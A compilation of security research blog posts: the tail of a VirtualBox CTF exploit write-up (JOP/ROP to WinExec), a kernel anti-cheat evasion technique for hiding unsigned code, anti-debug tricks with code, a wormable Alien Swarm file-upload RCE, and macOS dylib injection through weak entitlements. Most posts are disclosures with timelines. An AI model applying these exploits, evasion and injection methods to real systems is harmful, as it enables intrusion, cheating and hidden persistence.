JOP requires some kind of register control, but at the point at which our callback is invoked we only control a single register, r8. An additional constraint is that since we only leaked a pointer from VBoxC.dll we’re limited to JOP gadgets within that library. Our goal for this JOP chain is to perform a stack pivot into some memory on the heap where we will place a ROP chain that will do the heavy lifting and eventually pop a calc.

Sounds easy enough, let’s see what we can come up with :P

Our first issue is that we need to find some memory area where we can put the JOP data. Since our OOB write only allows us to write to the heap, that’ll have to do. But we can’t just go around writing stuff to the heap because that will most likely corrupt some heap metadata, or newly allocated objects will corrupt us. So we need to get a buffer allocated first and write to that. We can abuse the pszPatterns field in our spray for that. If we extend the pattern size to 0x70 bytes and place a known magic value in the first quad-word, we can use the OOB read to find that magic on the heap and overwrite the remaining 0x68 bytes with our payload. We’re the ones who allocated that string so it won’t get free’d randomly so long as we hold a reference to it and since we already leaked a heap address, we’re also able to calculate the address of our string and can use it in the JOP chain.

After spending ~30min straight reading through VBoxC.dll assembly together with localo, we finally came up with a way to get from r8 control to rsp control. I had trouble figuring out a way to describe the JOP chain, so css wizard localo created an interactive visualization in order to make following the chain easier. To simplify things even further, the visualization will show all registers with uncontrolled contents as XXX and any reading or uncontrolled writing operations to or from those registers will be ignored.

Let’s assume the JOP payload in our string is located at 0x1230 and r8 points to it. We trigger the callback, which will execute the jmp [r8+0x10]. You can click through the slides to understand what happens:

We managed to get rsp to point into our string and the next ret will kickstart ROP execution. From this point on, it’s just a matter of crafting a textbook WinExec("calc\x00") ROP-chain. But for the sake of completeness I’ll mention the gist of it. First, we read the address of a symbol from VBoxC.dll’s IAT. The IAT is comparable to a global offset table on linux and contains pointers to dynamically linked library symbols. We’ll use this to leak a pointer into kernel32.dll. Then we can calculate the runtime address of WinExec() in kernel32.dll, set rcx to point to "calc\x00" and call WinExec which will pop a calculator.

However there is a little twist to this. A keen eye might have noticed that we set rbp to 0x10000000 and that we are using a leave; jmp rax gadget to get to WinExec in rop_gadget_5 instead of just a simple jmp rax. That is because we were experiencing some major issues with stack alignment and stack frame size when directly calling WinExec with the stack pointer still pointing into our heap payload. It turns out, that WinExec sets up a rather large stack frame and the distance between out fake stack and the start of the heap isn’t always large enough to contain it. Therefore we were getting paging issues. Luckily, 0x4d5a and localo knew from reading this blog post about the vram section which has weak randomisation and it turns out that the range from 0xcb10000 to 0x13220000 is always mapped by that section. So if we set rbp to 0x10000000 and call a leave; jmp rax it will set the stack pointer to 0x10000000 before calling WinExec and thereby giving it enough space to do all the stack setup it likes ;)

Demo

‘nuff said! Here’s the demo:

You can find this version of our exploit here.

Credits

Writing this exploit was a joint effort of a bunch of people.

  • ESPR’s spq, tsuro and malle who don’t need an introduction :D

  • My ALLES! teammates and Windows experts Alain Rödel aka 0x4d5a and Felipe Custodio Romero aka localo

  • niklasb for his prior work and for some helpful pointers!

“A ROP chain a day keeps the doctor away. Immer dran denken, hat mein Opa immer gesagt.”

~ Niklas Baumstark (2021)

  • myself, Ilias Morad aka A2nkF :)

I had the pleasure of working with this group of talented people over the course of multiple sleepless nights and days during and even after the CTF was already over just to get the exploit working properly on a release build of VirtualBox and to improve stability. This truly shows what a small group of dedicated people is able to achieve in an incredibly short period of time if they put their minds to it! I’d like to thank every single one of you :D

Conclusion

This was my first time working with VirtualBox so it was a very educational and fun exercise. We managed to write a working exploit for a debug build of virtual box with 3h left in the CTF but sadly, we weren’t able to port it to a release build in time for the CTF due to anti-debugging in VirtualBox which made figuring out what exactly was breaking very hard. The next day we rebuilt VirtualBox without the anti-debugging/process hardening and finally properly ported the exploit to work with the latest release build of VirtualBox. We recommend you disable SCSI on your VirtualBox until this bug is patched.

The Organizers even agreed to demo our exploit in a live stream on their twitch channel afterwards and after some offset issues we finally got everything working!

I’d like to thank ChenNan again for creating the challenge and RealWorld CTF for being the excellent CTF we all grew to love. I’m looking forward to next years edition, where we hopefully will have an on-site finale in China again :).

This exploit was assigned CVE-2021-2119.

Part two…

This was the initial version of our exploit and it turned out to have a couple of issues which caused it to be a little fragile and somewhat unreliable. After the CTF was over we got together once more and attempted to identify and mitigate these weaknesses. localo will explain these issues and our workarounds in part two of this post (coming soon!).

Stay safe and happy pwning!

Hiding execution of unsigned code in system threads

12 January 2021 at 00:00
By: drew

Anti-cheat development is, by nature, reactive; anti-cheats exist to respond to and thwart a videogame’s population of cheaters. For instance, a videogame with an exceedingly low amount of cheaters would have little need for an anti-cheat, while a videogame rife with cheaters would have a clear need for an anti-cheat. In order to catch cheaters, anti-cheats will employ as many methods as possible. Unfortunately, anti-cheats are not omniscient; they can not know of every single method or detection vector to catch cheaters. Likewise, the game hacks themselves must continue to discover new or unique methods in order to evade anti-cheats.

The Reactive Development Cycle of Game Hacking

This brings forth a reactive and continuous development cycle, for both the cheats and anti-cheats: the opposite party (cheat or anti-cheat) will employ a unique method to circumvent the adjacent party (anti-cheat or cheat) which, in response, will then do the same.

One such method employed by an increasing number of anti-cheats is to execute core anti-cheat functions from within the operating system’s kernel. A clear advantage over the alternative (i.e. usermode execution) is in the fact that, on Windows NT systems, the anti-cheat can selectively filter which processes are able to interact with the memory of the game process in which they are protecting, thus nullifying a plethora of methods used by game hacks.

In response to this, many (but not all) hack developers made (or are making) the decision to do the same; they too would, or will, execute their hack, either wholly or in part, from within the operating system’s kernel, thus nullifying what the anti-cheats had done.

Unlike with anti-cheats, however, this decision carries with it numerous concessions: namely, the fact that, for various reasons, it is most convenient (or it is only practical) to execute the hack as an unsigned kernel driver running without the kernel’s knowledge; the “driver” is typically a region of executable memory in the kernel’s address space and is never loaded or allocated by the kernel. In other words, it is a “manually-mapped” driver, loaded by a tool used by a game hack.

This ultimately provides anti-cheats with many opportunities to detect so-called “kernel-mode” or “ring 0” game hacks (noting that those terms are typically said with a marketable significance; they are literally used to market such game hacks, as if to imply robustness or security); if the anti-cheat can prove that the system is executing, or had executed, unsigned code, it can then potentially flag a user as being a cheater.

Analyzing a Thread’s Kernel Stack

One such method - the focus of this article, in fact - of detecting unsigned code execution in the kernel is to iterate each thread that is running in the system (optionally deciding to only iterate threads associated with the system process, i.e. system threads) and to initiate some kind of stack trace.

Bluntly, this allows the anti-cheat to quite effectively determine if a cheat were executing unsigned code. For example, some anti-cheats (e.g. BattlEye) will queue to each system thread an APC which will then initiate a stack trace. If the stack trace returns an instruction pointer that is not within the confines of any loaded kernel driver, the anti-cheat can then know that it may have encountered a system thread that is executing unsigned code. Furthermore, because it is a stack trace and not a direct sampling of the return instruction pointer, it would work quite reliably, even if a game hack were, for example, executing a spin-loop or continuous wait; the stack trace would always lead back to the unsigned code.

It is quite clear to any cheat developer that they can respond to this behavior by simply running their thread(s) with kernel APCs disabled, preventing delivery of such APCs and avoiding the detection vector. As is will be seen, however, this method does not entirely prevent detection of unsigned code execution.

(Copying Out, Then) Analyzing a Thread’s Kernel Stack

Certain anti-cheats - EasyAntiCheat, in particular - had a much more apt method of generating a pseudo-stacktrace: instead of generating a stack trace with a blockable APC, why not copy the contents of the thread’s kernel stack asynchronously? Continuing the reactive cheat-anti-cheat development cycle, EasyAntiCheat had opted to manually search for instances of nonpaged code pointers that may have been left behind as a result of system thread execution.

While the downsides of this method are debatable, the upside is quite clear: as long as the thread is making procedure calls (e.g. x86 call instruction) from within its own code, either to kernel routines or to its own, and regardless of its IRQL or if the thread is even running, its execution will leave behind detectable traces on its stack in the form of pointers to its own code which can be extracted and analyzed.

Callouts: Continuing The Reactive Development Cycle

Proposed is the “callout” method of system thread execution, born from the recognition that:

  1. A thread’s kernel stack, as identified by the kernel stack pointer in a thread’s ETHREAD object, can be analyzed asynchronously by a potential anti-cheat to detect traces of unsigned code execution; and that
  2. To be useful in most cases, a system thread must be able to make calls to most external NT kernel or executive procedures with little compromise.

The Life-cycle of the Callout Thread

The life-cycle of a callout thread is quite simple and can be used to demonstrate its implementation:

  • Before thread creation:
    • Allocate a non-paged stack to be loaded by the thread; the callout thread’s “real stack”
    • Allocate shellcode (ideally in executable memory not associated with the main driver module) which disables interrupts, preserves the old/kernel stack pointer (as it was on function entry), loads the real stack, and jumps to an initialization routine (the callout thread’s “bootstrap routine”)
    • Create a system thread (i.e. PsCreateSystemThread) whose start address points to the initialization shellcode
  • At thread entry (i.e. the bootstrap routine):
    • Preserve the stack pointer that had been given to the thread at thread entry (this must be given by the shellcode)
    • (Optionally) Iterate the thread’s old/kernel stack pointer, ceasing iteration at the stack base, eliminating any references/pointers to the initialization shellcode
    • (Optionally) Eliminate references to the initialization shellcode within the thread’s ETHREAD; for example, it may be worth changing the thread’s start address
    • (Optionally, but recommended) Free the memory containing the initialization shellcode, if it was allocated separately from the driver module
    • Proceed to thread execution

In clearer terms, the callout thread spends most of its time executing the driver’s unsigned code with interrupts disabled and with its own kernel stack - the real stack. It can also attempt to wipe any other traces of its execution which may have been present upon its creation.

The Usefulness of the Callout Thread

The callout thread must also be capable of executing most, if not all, NT kernel and executive procedures. As proposed, this is effectively impossible; the thread must run with interrupts disabled and with its own stack, thus creating an obvious problem as most procedures of interest would run at an IRQL <= DISPATCH_LEVEL. Furthermore, the NT IRQL model may be liable to ignore our setting of the interrupt flag, causing most routines to unpredictibly enter a deadlock or enable interrupts without our consent.

A mechanism to allow for a callout thread to invoke these routines of interest, the callout mechanism, is therefore used to:

  1. Provide a routine which can be used to conveniently invoke (“call out”) an external function; and in this routine,
  2. Load the thread’s original/kernel stack pointer;
  3. Copy function arguments on to the kernel thread’s stack from the real stack;
  4. Enable interrupts;
  5. Invoke the requested routine (within the same instruction boundary as when interrupts are enabled);
  6. Cleanly return from the routine without generating obvious stack traces (e.g. function pointers);
  7. Load the real stack pointer and disable the interrupt flag, and do so before returning to unsigned code; and
  8. Continue execution, preserving the function’s return value

While somewhat complicated, the callout mechanism can be achieved easily and, to a reasonable degree, portably, using two widely-available ROP gadgets from within the NT kernel.

The Usefulness of IRET(Q)

The constraint of needing to load a new stack pointer, interrupt flag, and interrupt pointer within an instruction boundary was immediately satisfied by the IRET instruction.

For those unfamiliar, the IRET (lit. “interrupt return”) instruction is intended to be used by an operating system or executive (here, the NT kernel) to return from an interrupt routine. To support the recognition of an interrupt from any mode of execution, and to generically resume to any mode of execution, the processor will need to (effectively) preserve the instruction pointer, stack pointer, CPL or privilege level (through the CS and SS selectors; and while they have a more general use-case, this is effectively what is preserved on most operating systems with a flat memory model), and RFLAGS register (as interrupts may be liable to modify certain flags).

To report this information to the OS interrupt handler, the CPU will, in a specific order:

  1. Push the SS (stack segment selector) register;
  2. Push the RSP (stack pointer) register;
  3. Push the RFLAGS (arithmetic/system flags) register;
  4. Push the CS (code segment selector) register;
  5. Push the RIP (instruction pointer) register; and, for some exception-class interrupts,
  6. Push an error code which may describe certain interrupt conditions (e.g. a page fault will know if the fault was caused by a non-present page, or if it were caused by a protection violation)

Note that the error code is not important to the CPU and must be accounted for by the interrupt handler. Each operation is an 8-byte push, meaning that, when the interrupt handler is invoked, the stack pointer will point to the preserved RIP (or error code) values.

It is hopefully obvious as to how, approximately, the IRET instruction would be implemented:

  1. Pop a value from the stack to retrieve the new instruction pointer (RIP)
  2. Pop a value from the stack to retrieve the new code segment selector (CS)
  3. Pop a value from the stack to retrieve the new arithmetic/system flags register (RFLAGS)
  4. Pop a value from the stack to retrieve the new stack pointer (RSP)
  5. Pop a value from the stack to retrieve the new stack segment selector (SS)

Or, as modeled as a series of pseudo-assembly instructions,

GENERIC_INTERRUPT:

;note that all push and pop operations are 8 bytes (64 bits) wide!
push ss
push rsp
push rflags
push cs
push rip ;return instruction pointer
;optionally, push a zero-extended 4-byte error code. any interrupt which pushes an error code must have its handler add 8 bytes to their instruction pointer before executing its IRET.

IRET:

pop rip ;pop return instruction pointer into RIP. do not treat this as a series of regular assembly instructions; treat it instead as CPU microcode!
pop cs
pop rflags
pop rsp
pop ss

The callout mechanism uses the IRET instruction to accomplish its constraints, as the desired RFLAGS (which holds the interrupt flag), instruction pointer, and stack pointer can be loaded by the instruction at the same time (within an instruction boundary).

ROP; Chaining It All Together

To reiterate, the callout routine uses IRET to change the instruction pointer, stack pointer, and interrupt flag within the same instruction boundary in order to jump to external procedures with the interrupt flag enabled. This must be done within an instruction boundary to prevent unfortunately-timed external interrupts from being received just before the external procedure call.

It, however, must also be able to return from the external procedure call without leaving unsigned code pointers on the kernel stack; furthermore, it must also not rely on unlikely/unaligned ROP gadgets (e.g. a cli;ret sequence) which may not exist on future NT kernel builds. Thus also required is an IRET instruction to be executed upon the routine’s completion.

It must be recognized that the nature of the IRET instruction is such that the return instruction pointer is located on the stack. However, it is also recognized that a new stack pointer is loaded. We can therefore use IRET to load the callout thread’s real stack, with the stack pointer pointing to the actual return address.

This eliminates the problem of code pointers being present in the kernel stack; the return address back to our thread’s execution is located on another stack loaded by IRET and which isn’t obviously visible on a stack trace. To facilitate this, the stack frame loaded by the IRET gadget must be such that the return instruction pointer simply contains a RET instruction.

So, the ideal stack frame when calling an external procedure is as such:

  1. IRET return data, where the return address is a RET instruction within ntoskrnl.exe (or any region of signed code), and where the stack pointer to load is the thread’s real stack; which would have a return address pushed on to it; and
  2. The address of an IRET instruction within a region of signed code

Within most, if not all, versions of ntoskrnl.exe, this can be achieved with a simple RET instruction (0xC3 byte); along with the following gadget:

mov rsp, rbp
mov rbp, [rbp + some_offset] ;where some_offset could be liable to change
add rsp, some_other_offset
iretq

This also slightly modifies the mechanism of the ROP chain in that it must also load a pointer to the desired IRET frame in RBP when calling the function. Thankfully, the x64 calling convention specifies the RBP register as non-volatile, or unchanging across function calls, meaning that we can initialize it with our desired pointer when invoking the external procedure. It also means that the callout mechanism is permitted to allocate a non-paged region of memory to be given in RBP; preventing it from having to keep an IRET frame on the kernel stack. This notes, of course, the potential for an awful race condition where an interrupt is received in between the mov rsp, rbp and iretq instructions; the stack pointer value may point to memory that is insufficient to use for stack operations.

In having the external procedure return to the above IRET gadget, we can easily return to our unsigned code without ever leaking unsigned code pointers on the kernel stack.

Implementation

An example implementation of the callout mechanism can be found here.

New year, new anti-debug: Don’t Thread On Me

4 January 2021 at 23:00
By: jm

With 2020 over, I’ll be releasing a bunch of new anti-debug methods that you most likely have never seen. To start off, we’ll take a look at two new methods, both relating to thread suspension. They aren’t the most revolutionary or useful, but I’m keeping the best for last.

Bypassing process freeze

This one is a cute little thread creation flag that Microsoft added into 19H1. Ever wondered why there is a hole in thread creation flags? Well, the hole has been filled with a flag that I’ll call THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE (I have no idea what it’s actually called) whose value is, naturally, 0x40.

To demonstrate what it does, I’ll show how PsSuspendProcess works:

NTSTATUS PsSuspendProcess(_EPROCESS* Process)
{
  const auto currentThread = KeGetCurrentThread();
  KeEnterCriticalRegionThread(currentThread);

  NTSTATUS status = STATUS_SUCCESS;
  if ( ExAcquireRundownProtection(&Process->RundownProtect) )
  {
    auto targetThread = PsGetNextProcessThread(Process, nullptr);
    while ( targetThread )
    {
      // Our flag in action
      if ( !targetThread->Tcb.MiscFlags.BypassProcessFreeze )
        PsSuspendThread(targetThread, nullptr);

      targetThread = PsGetNextProcessThread(Process, targetThread);
    }
    ExReleaseRundownProtection(&Process->RundownProtect);
  }
  else
    status = STATUS_PROCESS_IS_TERMINATING;

  if ( Process->Flags3.EnableThreadSuspendResumeLogging )
    EtwTiLogSuspendResumeProcess(status, Process, Process, 0);

  KeLeaveCriticalRegionThread(currentThread);
  return status;
}

So as you can see, NtSuspendProcess that calls PsSuspendProcess will simply ignore the thread with this flag. Another bonus is that the thread also doesn’t get suspended by NtDebugActiveProcess! As far as I know, there is no way to query or disable the flag once a thread has been created with it, so you can’t do much against it.

As far as its usefulness goes, I’d say this is just a nice little extra against dumping and causes confusion when you click suspend in Processhacker, and the process continues to chug on as if nothing happened.

Example

For example, here is a somewhat funny code that will keep printing I am running. I am sure that seeing this while reversing would cause a lot of confusion about why the hell one would suspend his own process.

#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x40

NTSTATUS printer(void*) {
    while(true) {
        std::puts("I am running\n");
        Sleep(1000);
    }
    return STATUS_SUCCESS;
}

HANDLE handle;
NtCreateThreadEx(&handle, MAXIMUM_ALLOWED, nullptr, NtCurrentProcess(),
                 &printer, nullptr, THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE,
                 0, 0, 0, nullptr);

NtSuspendProcess(NtCurrentProcess());

Suspend me more

Continuing the trend of NtSuspendProcess being badly behaved, we’ll again abuse how it works to detect whether our process was suspended.

The trick lies in the fact that suspend count is a signed 8-bit value. Just like for the previous one, here’s some code to give you an understanding of the inner workings:

ULONG KeSuspendThread(_ETHREAD *Thread)
{
  auto irql = KeRaiseIrql(DISPATCH_LEVEL);
  KiAcquireKobjectLockSafe(&Thread->Tcb.SuspendEvent);

  auto oldSuspendCount = Thread->Tcb.SuspendCount;
  if ( oldSuspendCount == MAXIMUM_SUSPEND_COUNT ) // 127
  {
    _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
    KeLowerIrql(irql);
    ExRaiseStatus(STATUS_SUSPEND_COUNT_EXCEEDED);
  }

  auto prcb = KeGetCurrentPrcb();
  if ( KiSuspendThread(Thread, prcb) )
    ++Thread->Tcb.SuspendCount;

  _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
  KiExitDispatcher(prcb, 0, 1, 0, irql);
  return oldSuspendCount;
}

If you take a look at the first code sample with PsSuspendProcess it has no error checking and doesn’t care if you can’t suspend a thread anymore. So what happens when you call NtResumeProcess? It decrements the suspend count! All we need to do is max it out, and when someone decides to suspend and resume us, they’ll actually leave the count in a state it wasn’t previously in.

Example

The simple code below is rather effective:

  • Visual Studio - prevents it from pausing the process once attached.
  • WinDbg - gets detected on attach.
  • x64dbg - pause button becomes sketchy with error messages like “Program is not running” until you manually switch to the main thread.
  • ScyllaHide - older versions used NtSuspendProcess and caused it to be detected, but it was fixed once I reported it.
for(size_t i = 0; i < 128; ++i)
  NtSuspendThread(thread, nullptr);

while(true) {
  if(NtSuspendThread(thread, nullptr) != STATUS_SUSPEND_COUNT_EXCEEDED)
    std::puts("I was suspended\n");
  Sleep(1000);
}

Conclusion

If anything, I hope that this demonstrated that it’s best not to rely on NtSuspendProcess to work as well as you’d expect for tools dealing with potentially malicious or protected code. Hope you liked this post and expect more content to come out in the upcoming weeks.

Wormable remote code execution in Alien Swarm

30 October 2020 at 23:00
By: mev

Alien Swarm was originally a free game released circa July 2010. It differs from most Source Engine games in that it is a top-down shooter, though with gameplay elements not dissimilar from Left 4 Dead. Fallen to the wayside, a small but dedicated community has expanded the game with Alien Swarm: Reactive Drop. The game averages about 800 users per day at peak, and is still actively updated.

Over a decade ago, multiple logic bugs in Source and GoldSrc titles allowed execution of arbitrary code from client to server, and vice-versa, allowing plugins to be stolen or arbitrary data to be written from client to server, or the reverse. We’ll be exploring a modern-day example of this, in Alien Swarm: Reactive Drop.

Client <-> Server file upload

Any Alien Swarm client can upload files to the game server (and vice versa) using the CNetChan->SendFile API, although with some questionable constraints: a client-side check in the game prevents the server from uploading files of certain extensions such as .dll, .cfg:

if ( (!(*(unsigned __int8 (__thiscall **)(int, char *, _DWORD))(*(_DWORD *)(dword_104153C8 + 4) + 40))(
         dword_104153C8 + 4,
         filename,
         0)
   || should_redownload_file((int)filename))
  && !strstr(filename, "//")
  && !strstr(filename, "\\\\")
  && !strstr(filename, ":")
  && !strstr(filename, "lua/")
  && !strstr(filename, "gamemodes/")
  && !strstr(filename, "addons/")
  && !strstr(filename, "..")
  && CNetChan::IsValidFileForTransfer(filename) ) // fails if filename ends with ".dll" and more
{ /* accept file */ }
bool CNetChan::IsValidFileForTransfer( const char *input_path )
{
    char fixed_slashes[260];

    if (!input_path || !input_path[0])
        return false;

    int l = strlen(input_path);
    if (l >= sizeof(fixed_slashes))
        return false;

    strncpy(fixed_slashes, input_path, sizeof(fixed_slashes));
    FixSlashes(fixed_slashes, '/');
    if (fixed_slashes[l-1] == '/')
        return false;

    if (
        stristr(input_path, "lua/")
        || stristr(input_path, "gamemodes/")
        || stristr(input_path, "scripts/")
        || stristr(input_path, "addons/")
        || stristr(input_path, "cfg/")
        || stristr(input_path, "~/")
        || stristr(input_path, "gamemodes.txt")
        )
        return false;

    const char *ext = strrchr(input_path, '.');
    if (!ext)
        return false;

    int ext_len = strlen(ext);
    if (ext_len > 4 || ext_len < 3)
        return false;

    const char *check = ext;
    while (*check)
    {
        if (isspace(*check))
            return false;

        ++check;
    }

    if (!stricmp(ext, ".cfg") ||
        !stricmp(ext, ".lst") ||
        !stricmp(ext, ".lmp") ||
        !stricmp(ext, ".exe") ||
        !stricmp(ext, ".vbs") ||
        !stricmp(ext, ".com") ||
        !stricmp(ext, ".bat") ||
        !stricmp(ext, ".dll") ||
        !stricmp(ext, ".ini") ||
        !stricmp(ext, ".log") ||
        !stricmp(ext, ".lua") ||
        !stricmp(ext, ".nut") ||
        !stricmp(ext, ".vdf") ||
        !stricmp(ext, ".smx") ||
        !stricmp(ext, ".gcf") ||
        !stricmp(ext, ".sys"))
        return false;

    return true;
}

Bypassing "//" and ".." can be done with "/\\" because there is a call to FixSlashes that makes proper slashes after the sanity check, and for the ".." the "/\\" will set the path to the root of the drive, so we can write to anywhere on the system if we know the path. Bypassing "lua/", "gamemodes/" and "addons/" can be done by using capital letters e.g. "ADDONS/" since file paths are not case sensitive on Windows.

Bypassing the file extension check is a bit more tricky, so let’s look at the structure sent by SendFile called dataFragments_t:

typedef struct dataFragments_s
{
    FileHandle_t    file;                 // open file handle
    char            filename[260];        // filename
    char*           buffer;               // if NULL it's a file
    unsigned int    bytes;                // size in bytes
    unsigned int    bits;                 // size in bits
    unsigned int    transferID;           // only for files
    bool            isCompressed;         // true if data is bzip compressed
    unsigned int    nUncompressedSize;    // full size in bytes
    bool            isReplayDemo;         // if it's a file, is it a replay .dem file?
    int             numFragments;         // number of total fragments
    int             ackedFragments;       // number of fragments send & acknowledged
    int             pendingFragments;     // number of fragments send, but not acknowledged yet
} dataFragments_t;

The 260 bytes name buffer in dataFragments_t is used for the file name checks and filters, but is later copied and then truncated to 256 bytes after all the sanity checks thus removing our fake extension and activating the malicious extension:

Q_strncpy( rc->gamePath, gamePath, BufferSize /* BufferSize = 256 */ );

Using a file name such as ./././(...)/file.dll.txt (pad to max length with ./) would get truncated to ./././(...)/file.dll on the receiving end after checking if the file extension is valid. This also has the side effect that we can overwrite files as the file exists check is done before the file extension truncation.

Remote code execution

Using the aforementioned remote file inclusion, we can upload Source Engine config files which have the potential to execute arbitrary code. Using Procmon, I discovered that the game engine searches for the config file in both platform/cfg and swarm/cfg respectively:

procmon

We can simply upload a malicious plugin and config file to platform/cfg and hijack the server. This is due to the fact that the Source Engine server config has the capability to load plugins with the plugin_load command:

plugin_load addons/alien_swarm_exploit.dll

This will load our dynamic library into the game server application, granting arbitrary code execution. The only constraint is that the newmapsettings.cfg config file is only reloaded on map change, so you will have to wait till the end of a game.

Wormable demonstration

Since both of these exploits apply to both the server and the client, we can infect a server, which can infect all players, which can carry on the virus when playing other servers. This makes this exploit chain completely wormable and nothing but a complete shutdown of the game servers can fix it.

Timeline

  • [2020-05-12] Reported to Valve on HackerOne
  • [2020-05-13] Triaged by Valve: “Looking into it!”
  • [2020-08-03] Patched in beta branch
  • [2020-08-18] Patched in release

Abusing MacOS Entitlements for code execution

14 August 2020 at 23:00

Recently I disclosed some vulnerabilities to Dropbox and PortSwigger via H1 and Microsoft via MSRC pertaining to Application entitlements on MacOS. We’ll be exploring what entitlements are, what exactly you can do with them, and how they can be used to bypass security products.

These are all unpatched as of publish.

What’s an Entitlement?

On MacOS, an entitlement is a string that grants an Application specific permissions to perform specific tasks that may have an impact on the integrity of the system or user privacy. Entitlements can be viewed with the comand codesign -d --entitlements - $file.

Viewing the entitlements of the main Dropbox binary.

For the above image, we can see the key entitlements com.apple.security.cs.allow-unsigned-executable-memory and com.apple.security.cs.disable-library-validation - they allow exactly what they say on the tin. We’ll explore Dropbox first, as it’s the more involved of the two to exploit.

Dropbox

Just as Windows has PE and Linux has ELF, MacOS has its own executable format, Mach-O (short for Mach-Object). Mach-O files are used on all Apple products, ranging from iOS, to tvOS, to MacOS. In fact, all these operating systems share a common heritage stemming from NeXTStep, though that’s beyond the scope of this article.

MacOS has a variety of security protections in place, including Gatekeeper, AMFI (AppleMobileFileIntegrity), SIP (System Integrity Protection, a form of mandatory access control), code signing, etc. Gatekeeper is akin to Windows SmartScreen in that it fingerprints files, checks them against a list on Apple’s servers, and returns the value to determine if the file is safe to run. `

This is vastly simplified.

There are three configurable options, though the third is hidden by default - App Store only, App Store and identified developers, and “anywhere”, the third presumably hidden to minimize accidental compromise. Gatekeeper can also be managed by the command line tool, spctl(8), for more granular control of the system. One can even disable Gatekeeper entirely through spctl --master-disable, though this requires superuser access. It’s to be noted that this does not invalidate rules already in the System Policy database (/var/db/SystemPolicy), but allows anything not in the database, regardless of notarization, etc, to run unimpeded.

Now, back to Dropbox. Dropbox is compiled using the hardened runtime, meaning that without specific entitlements, JIT code cannot be executed, DYLD environment variables are automatically ignored, and unsigned libraries are not loaded (often resulting in a SIGKILL of the binary.) We can see that Dropbox allows unsigned executable memory, allowing shellcode injection, and has library validation disabled - meaning that any library can be inserted into the process. But how?

Using LIEF, we can easily add a new LoadCommand to Dropbox. In the following picture, you can see my tool, Coronzon, which is based off of yololib, doing the same.

Adding a LoadCommand to Dropbox

import lief

file = lief.parse('Dropbox')
file.add_library('inject.dylib')
file.write('Dropbox')

Using code similar to the following, one can execute code within the context of the Dropbox process (albeit via voiding the code signature - you’re best off stripping the code signature, or it won’t run from /Applications/). You’ll either have to strip the code signature or ad-hoc sign it to get it to run from /Applications/, though the application will lose any entitlements and TCC rights previously granted. You’ll have to use a technique known as dylib proxying - which is to say, replacing a library that is part of the application bundle with one of the same name that re-exports the library it’s replacing. (Using the link-time flags `-Xlinker -reexport_library $(PATH_TO_LIBRARY)).

#include <stdio.h>
#include <stdlib.h>
#include <syslog.h>

__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
 {
     printf("Hello from dylib!\n");
     syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
     system("open -a Calculator");
}

This is a simple example, but combined with something like frida-gum the impact becomes much more severe - allowing application introspection and runtime modification without the user’s knowledge. This makes for a great, persistent usermode implant, as Dropbox is added as a LaunchItem.

Visual Studio

Microsoft releases a cut-down version of their premier IDE for MacOS, mainly for C# development with Xamarin, .NET Core, and Mono. Though ‘cut-down’, it still supports many features of the original, including NuGet, IntelliSense, and more.

It also has some interesting entitlements.

Viewing the entitlements of the main Visual Studio binary.

Of course, MacOS users are treated as second class citizens in Microsoft’s ecosystem and Microsoft could not give a damn about the impact this has on the end user - which is similar in impact to the above, albeit more severe. We can see that basically every single feature of the hardened runtime is disabled - enabling the simplest of code injection methods, via the DYLD_INSERT_LIBRARIES environment variable. The following video is a proof of concept of just how easily code can be executed within the context of Visual Studio.

Keep in mind: code executing in this context will inherit the entitlements and TCC values of the parent. It’s not hard to imagine a scenario in which IP (intellectual property) theft could result from Microsoft’s attempts at ‘hardening’ Visual Studio for Mac. As with Dropbox, all the security implications are the same, yet it’s about 30x easier to pull off as DYLD environment variables are allowed.

Burp Suite

I’m sure most reading this article are familiar with Burp Suite. If not - it’s a web exploitation Swiss army knife that aids in recon, pre, and post-exploitation. So why don’t we exploit it?

This time, we’ll be exploiting the Burp Suite installer. As you’ll probably guess by now, it has some… interesting entitlements.

Viewing the entitlements of the Burp Installer stub.

Aside from the output lacking newlines, exploitation in this case is different. There are no shell scripts in the install (nor is the entitlement for allowing DYLD environment variables present), and if we’re going to create a malicious installer, we need to use what’s already packaged. So, we’ll tamper with the included JRE (jre.tar.gz) that’s included with the installer.

There’s actually two approaches to this - replacing a dylib outright or dylib hijacking. Dylib hijacking is similar to it’s partner, DLL hijacking, on Windows, in that it abuses the executable searching for a library that may or may not be there, usually specified by @rpath or sometimes a ‘weakref’. A weakref is a library that doesn’t need to be loaded, but can be loaded. For more information on dylib hijacking, I reccomend this excellent presentation by Patrick Wardle of Objective-See. For brevity, however, we’ll just be replacing a .dylib in the JRE.

The way the installer executes is that it extracts the JRE to a temporary location during install, which is used for the rest of the install. This temporary location is randomized and actually adds a layer of obfuscation to our attack, as no two executions will have the JRE extracted into the same place. Once the JRE is extraced, it’s loaded and attempts to install Burp Suite. This allows us to execute unsigned code under the guise and context of Burp Suite, running code in the background unbenknownst to the user. Thankfully Burp Suite doesn’t (currently) require elevated privileges to install on macOS. Nonetheless, this is an issue due to the ease of forging a malicious installer and the fact that Gatekeeper is none the wiser.

A proof of concept can be viewed below.

Conclusions

Entitlements are both a valuable component of MacOS’ security model, but can also be a double edged sword. You’ve seen how trivivally Gatekeeper and existing OS protections can be bypassed by leveraging a weak application as a trampoline - the one with the most impact in this case I argue to be Dropbox, due to inheritance of Dropbox’s TCC permissions and being a LaunchItem, thus gaining persistence. Thus, entitlements provide a valuable addition to the attack surface of MacOS for any red-teamer or bug-bounty hunter. Your mileage may vary, however - Dropbox and Microsoft didn’t seem to care much. (PortSwigger, on the other hand, admitted that due to the design of Burp Suite and inherent language intrinsics it’s extremely hard to prevent such an attack - and I don’t fault them).

Happy hacking.

Disclosure Timelines


Dropbox

  • June 11th, initial disclosure.
  • June 17th, additional information added
  • June 20th, closed as Informative

Visual Studio

  • June 19th, initial disclosure
  • June 22nd, closed (“Upon investigation, we have determined that this submission does not meet the bar for security servicing. This report does not appear to identify a weakness in a Microsoft product or service that would enable an attacker to compromise the integrity, availability, or confidentiality of a Microsoft offering. “)

Burp Suite

  • June 27th, initial disclosure
  • June 30th, closed as Informative

BattlEye client emulation

6 July 2020 at 23:00
By: vmcall

